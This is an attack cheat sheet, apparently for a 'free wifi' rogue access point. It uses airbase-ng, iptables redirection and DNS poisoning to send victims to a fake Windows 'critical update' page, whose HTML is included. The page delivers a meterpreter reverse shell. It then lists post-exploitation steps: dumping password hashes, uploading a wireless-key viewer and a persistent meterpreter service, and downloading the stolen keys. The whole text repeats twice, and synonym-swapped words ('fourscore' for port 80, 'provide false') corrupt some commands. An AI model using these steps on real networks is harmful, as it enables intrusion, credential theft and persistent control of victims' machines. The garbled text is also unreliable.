dhclient wlan0 //// Connect to the internet, tin last eth0
*****Setup metasploit listener********* ///// u demand to exercise the meterpreter reverse_tcp connectedness --- data is available inwards many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v ////// tin purpose diverse commands here
*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = road to the internet
/etc/init.d/dhcp3-server restart // backtrack users purpose dhcpd
/etc/init.d/lighttpd halt
lighttpd -D -f '/home/hm/Desktop/http/http' //webserver amongst faux update page
**********************************************************************
direct whatever asking to apache
iptables -t nat -A PREROUTING -p tcp --dport fourscore -j DNAT --to 10.0.0.1 //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************
NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v
su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport fourscore -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
cd / /// dnspoison available at http://dnspentest.sourceforge.net/
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1
****************************************************************************
**** Check for victims ********
arp -n -v -i at0
session - l
session -i
sysinfo
getuid
use priv
hashdump
***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless cardinal viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... banking venture tally below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt
misc......
wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service
Index html -
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #999999;
}
.style3 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
}
.style4 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<p><img src="/udntitled.jpg" alt=" u demand to exercise the meterpreter contrary Commands for faux AP" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability inwards Windows XP, Vista, Windows 2000 detected. Download as well as installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); provide false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
*****Setup metasploit listener********* ///// u demand to exercise the meterpreter reverse_tcp connectedness --- data is available inwards many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v ////// tin purpose diverse commands here
*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = road to the internet
/etc/init.d/dhcp3-server restart // backtrack users purpose dhcpd
/etc/init.d/lighttpd halt
lighttpd -D -f '/home/hm/Desktop/http/http' //webserver amongst faux update page
**********************************************************************
direct whatever asking to apache
iptables -t nat -A PREROUTING -p tcp --dport fourscore -j DNAT --to 10.0.0.1 //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************
NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C xxx -e "free wifi" wlan1 -v
su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add together -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport fourscore -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
cd / /// dnspoison available at http://dnspentest.sourceforge.net/
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1
****************************************************************************
**** Check for victims ********
arp -n -v -i at0
session - l
session -i
sysinfo
getuid
use priv
hashdump
***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless cardinal viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... banking venture tally below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt
misc......
wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service
Index html -
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #999999;
}
.style3 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
}
.style4 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<p><img src="/udntitled.jpg" alt=" u demand to exercise the meterpreter contrary Commands for faux AP" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability inwards Windows XP, Vista, Windows 2000 detected. Download as well as installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); provide false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
